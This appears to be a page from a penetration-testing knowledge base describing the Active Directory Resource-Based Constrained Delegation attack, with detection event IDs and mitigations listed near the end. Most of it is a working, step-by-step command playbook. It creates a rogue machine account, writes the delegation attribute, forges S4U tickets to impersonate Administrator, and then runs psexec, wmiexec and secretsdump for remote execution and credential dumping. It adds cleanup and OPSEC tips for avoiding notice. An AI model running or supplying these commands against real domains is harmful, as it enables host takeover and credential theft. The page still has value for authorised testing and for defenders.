attack-17-resource-based-constrained-delegation-rbcd.md (10540B)
1 --- 2 title: "Attack #17 β Resource-Based Constrained Delegation (RBCD)" 3 description: "Resource-Based Constrained Delegation (RBCD) flips traditional Constrained Delegation on its head. Instead of the delegating account specifying whichβ¦" 4 category: active-directory 5 subcategory: "Kerberos & Delegation" 6 tags: ["active-directory", "delegation"] 7 tools: ["NetExec", "Impacket", "Rubeus", "BloodHound", "ldapsearch"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Two/π Attack #17 β Resource-Based Constrained Delegation (RBCD).md" 11 --- 12 # π Attack #17 β Resource-Based Constrained Delegation (RBCD) 13 14 *** 15 16 ## π How It Works 17 18 Resource-Based Constrained Delegation (RBCD) flips traditional Constrained Delegation on its head. Instead of the **delegating account** specifying which services it can delegate to (via `msDS-AllowedToDelegateTo`), the **target resource** specifies which accounts are allowed to delegate to it (via `msDS-AllowedToActOnBehalfOfOtherIdentity`). This means anyone who can **write to a computer object's attributes** can configure RBCD on it β allowing a controlled account to impersonate any user to that computer. 19 20 ### Why RBCD is So Dangerous 21 22 1. **No Domain Admin required to configure** β only GenericWrite/GenericAll on the target computer 23 2. **MachineAccountQuota** allows any domain user to create up to 10 computer accounts by default 24 3. **Combining write permissions + machine account creation = full compromise of the target host** 25 26 ### The Full Attack Flow 27 28 ``` 29 1. Identify a computer object where you have write permissions (GenericWrite/GenericAll) 30 2. Create a machine account you control (or use an existing one) 31 3. Set msDS-AllowedToActOnBehalfOfOtherIdentity on the TARGET computer 32 to trust your machine account 33 4. Use S4U2Self + S4U2Proxy from your machine account to impersonate 34 Administrator to the target computer 35 5. Access the target as Administrator (CIFS, HOST, LDAP, etc.) 36 ``` 37 38 *** 39 40 ## βοΈ Prerequisites 41 42 | Requirement | Detail | 43 |---|---| 44 | **Write permissions on target computer** | GenericWrite, GenericAll, WriteDACL, or specific write to `msDS-AllowedToActOnBehalfOfOtherIdentity` | 45 | **Controlled machine account** | Create via MachineAccountQuota (default 10) or use existing compromised computer | 46 | **Domain user account** | To create machine account and configure RBCD | 47 48 *** 49 50 ## π οΈ Tools 51 52 | Tool | Platform | Notes | 53 |---|---|---| 54 | **Impacket β rbcd.py** | Linux | Configure RBCD delegation | 55 | **Impacket β addcomputer.py** | Linux | Create machine accounts | 56 | **Impacket β getST.py** | Linux | S4U2Self + S4U2Proxy exploitation | 57 | **Rubeus** | Windows | S4U attack after RBCD configuration | 58 | **PowerView** | Windows | Write RBCD attribute on target | 59 | **StandIn** | Windows | .NET tool for RBCD manipulation | 60 | **bloodyAD** | Linux | All-in-one RBCD exploitation | 61 62 *** 63 64 ## π» Full Commands 65 66 ### π΅ Step 1 β Find Writable Computer Objects 67 68 ```powershell 69 # ββ PowerView β find computers where you have write access ββββββββββββββββββββ 70 Find-InterestingDomainAcl -ResolveGUIDs | 71 Where-Object { $_.ActiveDirectoryRights -match "GenericWrite|GenericAll|WriteDACL" -and 72 $_.ObjectClass -eq "computer" } 73 74 # ββ BloodHound Cypher query βββββββββββββββββββββββββββββββββββββββββββββββββββ 75 # MATCH p=(u:User {name:'LOW_USER@CORP.LOCAL'})-[r:GenericWrite|GenericAll]->(c:Computer) RETURN p 76 ``` 77 78 ```bash 79 # ββ BloodHound.py β collect and analyze βββββββββββββββββββββββββββββββββββββββ 80 bloodhound-python -u low_user -p 'Password1' -d corp.local -ns 10.10.10.10 -c All --zip 81 # Upload to BloodHound β "Find Shortest Paths to Domain Admins" 82 ``` 83 84 ### π΄ Step 2 β Create Machine Account 85 86 ```bash 87 # ββ Impacket β create machine account βββββββββββββββββββββββββββββββββββββββββ 88 addcomputer.py -computer-name 'FAKEMACHINE$' -computer-pass 'FakePass123!' \ 89 -dc-ip 10.10.10.10 corp.local/low_user:'Password1' 90 91 # ββ Check MachineAccountQuota (default = 10) ββββββββββββββββββββββββββββββββββ 92 nxc ldap DC01.corp.local -u low_user -p 'Password1' -M maq 93 # Or: 94 ldapsearch -x -H ldap://DC01.corp.local -D "low_user@corp.local" -w 'Password1' \ 95 -b "DC=corp,DC=local" "(objectClass=domain)" ms-DS-MachineAccountQuota 96 ``` 97 98 ```powershell 99 # ββ PowerShell β create machine account βββββββββββββββββββββββββββββββββββββββ 100 Import-Module .\\Powermad.ps1 101 New-MachineAccount -MachineAccount FAKEMACHINE -Password $( 102 ConvertTo-SecureString 'FakePass123!' -AsPlainText -Force 103 ) 104 ``` 105 106 ### π΄ Step 3 β Configure RBCD on Target 107 108 ```bash 109 # ββ Impacket β rbcd.py ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 110 rbcd.py -delegate-from 'FAKEMACHINE$' -delegate-to 'TARGET$' \ 111 -action write -dc-ip 10.10.10.10 corp.local/low_user:'Password1' 112 113 # ββ Verify ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 114 rbcd.py -delegate-to 'TARGET$' -action read \ 115 -dc-ip 10.10.10.10 corp.local/low_user:'Password1' 116 117 # ββ bloodyAD ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 118 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \ 119 add rbcd 'TARGET$' 'FAKEMACHINE$' 120 ``` 121 122 ```powershell 123 # ββ PowerShell / PowerView ββββββββββββββββββββββββββββββββββββββββββββββββββββ 124 $ComputerSid = Get-DomainComputer FAKEMACHINE -Properties objectsid | Select -Expand objectsid 125 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" 126 $SDBytes = New-Object byte[] ($SD.BinaryLength) 127 $SD.GetBinaryForm($SDBytes, 0) 128 Set-DomainObject -Identity TARGET$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} 129 130 # ββ StandIn βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 131 .\StandIn.exe --computer TARGET --sid <FAKEMACHINE_SID> 132 ``` 133 134 ### π΄ Step 4 β S4U Attack β Impersonate Administrator 135 136 ```bash 137 # ββ getST.py β S4U2Self + S4U2Proxy ββββββββββββββββββββββββββββββββββββββββββ 138 getST.py -spn cifs/TARGET.corp.local \ 139 -impersonate Administrator \ 140 -dc-ip 10.10.10.10 \ 141 corp.local/'FAKEMACHINE$':'FakePass123!' 142 143 # ββ Use the ticket ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 144 export KRB5CCNAME=Administrator@cifs_TARGET.corp.local@CORP.LOCAL.ccache 145 146 psexec.py -k -no-pass corp.local/Administrator@TARGET.corp.local 147 wmiexec.py -k -no-pass corp.local/Administrator@TARGET.corp.local 148 secretsdump.py -k -no-pass corp.local/Administrator@TARGET.corp.local 149 smbclient.py -k -no-pass corp.local/Administrator@TARGET.corp.local 150 ``` 151 152 ```powershell 153 # ββ Rubeus S4U ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 154 # First get FAKEMACHINE's hash: 155 .\Rubeus.exe hash /password:FakePass123! /user:FAKEMACHINE$ /domain:corp.local 156 # rc4_hmac: <hash> 157 158 .\Rubeus.exe s4u \ 159 /user:FAKEMACHINE$ \ 160 /rc4:<FAKEMACHINE_HASH> \ 161 /impersonateuser:Administrator \ 162 /msdsspn:cifs/TARGET.corp.local \ 163 /ptt 164 165 dir \\TARGET.corp.local\C$ 166 ``` 167 168 ### π΄ Step 5 β Cleanup 169 170 ```bash 171 # ββ Remove RBCD configuration ββββββββββββββββββββββββββββββββββββββββββββββββ 172 rbcd.py -delegate-to 'TARGET$' -action flush \ 173 -dc-ip 10.10.10.10 corp.local/low_user:'Password1' 174 175 # ββ Delete machine account (if desired) βββββββββββββββββββββββββββββββββββββββ 176 addcomputer.py -computer-name 'FAKEMACHINE$' -computer-pass 'FakePass123!' \ 177 -dc-ip 10.10.10.10 corp.local/low_user:'Password1' -delete 178 ``` 179 180 *** 181 182 ## π― OPSEC Tips 183 184 - **RBCD is the most commonly exploited delegation type** β no DA required, just GenericWrite on a computer 185 - **MachineAccountQuota = 10 by default** β almost always available for machine account creation 186 - **Cleanup is critical** β remove the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute and delete the machine account after exploitation 187 - **Protected Users group blocks delegation** β if Administrator is in Protected Users, impersonation will fail; target a different DA 188 189 *** 190 191 ## π‘οΈ Detection β Event IDs 192 193 | Event ID | Source | What to Look For | 194 |---|---|---| 195 | **5136** | Security Log (DC) | Modification of `msDS-AllowedToActOnBehalfOfOtherIdentity` | 196 | **4741** | Security Log (DC) | Computer account creation (MachineAccountQuota abuse) | 197 | **4769** | Security Log (DC) | S4U2Proxy TGS request | 198 | **4624** | Security Log | Network logon as impersonated user on target | 199 200 *** 201 202 ## π Attack Chain Context 203 204 ``` 205 [RBCD] βββ Compromise Any Computer You Can Write To 206 β 207 ββββ π GenericWrite on Computer β RBCD β impersonate DA β own that host 208 ββββ π» GenericAll (#19) β RBCD is one of the exploitation methods 209 ββββ π MAQ (#47) β create controlled machine accounts for RBCD 210 ββββ π Chain: ACL abuse β RBCD β DCSync (if target is DC) 211 ββββ π Defeated by: set MAQ=0, monitor 5136, Protected Users group 212 ``` 213 214 *** 215 216 > β **Attack #17 β RBCD complete.**